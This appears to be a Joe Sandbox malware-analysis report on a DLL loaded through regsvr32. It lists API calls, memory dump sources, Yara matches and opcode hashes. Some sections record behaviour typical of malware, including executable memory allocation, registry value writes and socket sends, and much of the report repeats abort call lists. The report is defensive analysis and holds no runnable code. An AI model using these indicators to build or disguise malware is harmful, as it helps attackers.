                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8FE
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D903
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D908
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D90D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID: @
                                                                  • API String ID: 4206212132-2766056989
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8F9
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D8FE
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D903
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D908
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D90D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,02647584,00000000,00020019,?), ref: 02635517
                                                                  • _memset.LIBCMT ref: 02635558
                                                                  • VirtualAlloc.KERNEL32(00000000,0264BF98,00003000,00000040), ref: 02635596
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026355C1
                                                                  • VirtualFree.KERNEL32(0264C7D4,00000000,00008000), ref: 02635615
                                                                  • _memset.LIBCMT ref: 02635679
                                                                  • _memset.LIBCMT ref: 0263569D
                                                                  • _memset.LIBCMT ref: 026356AF
                                                                  • VirtualAlloc.KERNEL32(00000000,0264BF98,00003000,00000040), ref: 02635736
                                                                  • RegCreateKeyW.ADVAPI32(80000001,02647584,?), ref: 026357A9
                                                                  • RegDeleteValueW.ADVAPI32(?,02647500), ref: 026357BC
                                                                  • RegSetValueExW.ADVAPI32(?,02647500,00000000,00000003,00000000,00000065), ref: 026357D4
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026357DE
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0263580E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$Virtual$AllocCloseValue$CreateDeleteFreeOpenSleep
                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                  • API String ID: 2494566644-159827627
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D912
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D917
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort
                                                                  • String ID:
                                                                  • API String ID: 4206212132-0
                                                                  APIs
                                                                    • Part of subcall function 6C944A90: strlen.MSVCRT ref: 6C944B0D
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D91C
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D921
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D926
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D92B
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D930
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D935
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93A
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D93F
                                                                  • abort.MSVCRT(?,?,?,?,00000001,?,6C94436B), ref: 6C94D944
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D94C
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D951
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D956
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D95B
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D960
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D965
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96A
                                                                  • abort.MSVCRT(?,?,00000008,?,?,00000000,6C9460A4), ref: 6C94D96F
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D974
                                                                  • abort.MSVCRT(?,?,6C94832C), ref: 6C94D979
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: abort$strlen
                                                                  • String ID:
                                                                  • API String ID: 2656325428-0
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000064), ref: 0263454A
                                                                  • timeGetTime.WINMM ref: 0263456B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263458B
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 026345AD
                                                                  • SwitchToThread.KERNEL32 ref: 026345C7
                                                                  • SetEvent.KERNEL32(?), ref: 02634610
                                                                  • CloseHandle.KERNEL32(?), ref: 02634634
                                                                  • send.WS2_32(?,02647440,00000010,00000000), ref: 02634658
                                                                  • SetEvent.KERNEL32(?), ref: 02634676
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02634681
                                                                  • WSACloseEvent.WS2_32(?), ref: 0263468F
                                                                  • shutdown.WS2_32(?,00000001), ref: 026346A3
                                                                  • closesocket.WS2_32(?), ref: 026346AD
                                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 026346E6
                                                                  • SetLastError.KERNEL32(000005B4), ref: 026346FA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263471B
                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02634733
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                  • String ID:
                                                                  • API String ID: 1692523546-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: 088acd37bd3a713edb7e45c284574c4c98f298a09f2d81b90e080a54e6eca424
                                                                  • Instruction ID: b4427c62e3d67c72a6382de97a69ec726517f71ead673faca7b53dd625f4829e
                                                                  • Opcode Fuzzy Hash: 088acd37bd3a713edb7e45c284574c4c98f298a09f2d81b90e080a54e6eca424
                                                                  • Instruction Fuzzy Hash: 4831807160934ACFE310CFA9D48076AB7E5BBC5308F54CA2EE59897B11E375E448CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID: @
                                                                  • API String ID: 39653677-2766056989
                                                                  • Opcode ID: 4959abcb8968e174813994c793cfa9136a0369d768946d19e3e5bed084c7554a
                                                                  • Instruction ID: ac695a5529ccda6a88f4c8b4f668007f9a5d802f67b2d50a8f551263c1069a4e
                                                                  • Opcode Fuzzy Hash: 4959abcb8968e174813994c793cfa9136a0369d768946d19e3e5bed084c7554a
                                                                  • Instruction Fuzzy Hash: 1B511575A042099FCB10DFA5C880BDEB7B5AB99318F54C5A9D949A7700DB30EE88CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: f053697617a4af61e89ce275da69e4e2f8eb43ba3e3e8cac62ed4faa79254380
                                                                  • Instruction ID: 5be1698b1de4dca7f35110074b801bca351bb078f12a8f26ed25fe3851916f97
                                                                  • Opcode Fuzzy Hash: f053697617a4af61e89ce275da69e4e2f8eb43ba3e3e8cac62ed4faa79254380
                                                                  • Instruction Fuzzy Hash: 424136B4A093018FD310CF69D48071ABBE5EB89708F10C92EE599CBB10D375D944CB92
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(026476BC), ref: 026363AC
                                                                  • GetProcAddress.KERNEL32(00000000,026476D4), ref: 026363BE
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 026363CF
                                                                  • _memset.LIBCMT ref: 026363FF
                                                                  • GetLocalTime.KERNEL32(?), ref: 0263640E
                                                                  • wsprintfW.USER32 ref: 02636455
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 02636474
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 02636482
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0263649B
                                                                  • GetCurrentProcessId.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 026364CB
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000000,00000000), ref: 026364D2
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 026364E0
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 026364E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CurrentFree$Process$AddressCloseCreateFileHandleLoadLocalProcThreadTime_memsetwsprintf
                                                                  • String ID:
                                                                  • API String ID: 3529074497-0
                                                                  • Opcode ID: a24e9e8923ae01ec4966aa2bfede903709046789b4cc424bf6190427ca67d109
                                                                  • Instruction ID: d13d631100e879f2c9c689866e8d20d37f52999be9c3a4c882f971c140f79b68
                                                                  • Opcode Fuzzy Hash: a24e9e8923ae01ec4966aa2bfede903709046789b4cc424bf6190427ca67d109
                                                                  • Instruction Fuzzy Hash: DA412B79D80228BBD7209F64EC4CBBEB7B8EF58B10F500599F94A96180DB745990CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd34584560973e336ae1521f29c27fa0068d46a18c8e27656b340b26851b4eef
                                                                  • Instruction ID: ef9ddf2f0367814595ae9b1916dd10527bedb3502225c07fed6f9a4bd415fc4b
                                                                  • Opcode Fuzzy Hash: bd34584560973e336ae1521f29c27fa0068d46a18c8e27656b340b26851b4eef
                                                                  • Instruction Fuzzy Hash: E3214A75A002089FCB14DFA4D880ADEB7B5BF95304F10C569DC4967700EB30EE49CB91
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 6C8FAAAC
                                                                  • GetFullPathNameW.KERNEL32(?,00000000,00000002,00000000,00000000), ref: 6C8FAABB
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAAC6
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAADB
                                                                  • memcmp.MSVCRT(?,100FF214,E8558CFB,?,00000000,00000002,00000000,00000000), ref: 6C8FAB4C
                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 6C8FAB7F
                                                                  • memcpy.MSVCRT(00000002,?,00000002,00000002,00000000,00000000), ref: 6C8FAC1F
                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,?,?,00000000,?,?,?,00000002,00000000,00000000), ref: 6C8FAD58
                                                                  • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6C8FAD67
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressFreeFullHandleHeapModuleNamePathProcmemcmpmemcpy
                                                                  • String ID: SetThreadDescription$kernel32
                                                                  • API String ID: 356422747-1950310818
                                                                  • Opcode ID: 14ae7c20b3de3db6af48975db04750b7eaa42a35009c19ca83ea20782fd32c2a
                                                                  • Instruction ID: 46d909dda3264ef4269f521674fd7054f8b974b8240720b590e30c4a8a9408e6
                                                                  • Opcode Fuzzy Hash: 14ae7c20b3de3db6af48975db04750b7eaa42a35009c19ca83ea20782fd32c2a
                                                                  • Instruction Fuzzy Hash: ADA1F771E01205AFEB208F68DE85BEEB7F8AF14768F244824E814E7741E771DD158BA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: !jWW$.$_$e$i$l${vU_
                                                                  • API String ID: 2102423945-159827627
                                                                  • Opcode ID: a8fc06458b62c315747c6bbdeb4651bf35221ba8392fa4a222c40d994eed00a2
                                                                  • Instruction ID: 23a0b90ebf42cde74fd678a392edfc6d9c6a6780f20df2d870585fedd9e67053
                                                                  • Opcode Fuzzy Hash: a8fc06458b62c315747c6bbdeb4651bf35221ba8392fa4a222c40d994eed00a2
                                                                  • Instruction Fuzzy Hash: 0791A675A40304BBE720EF60DC44FEA7BB9EB85704F508159F9099F280D775AA41CFA5
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
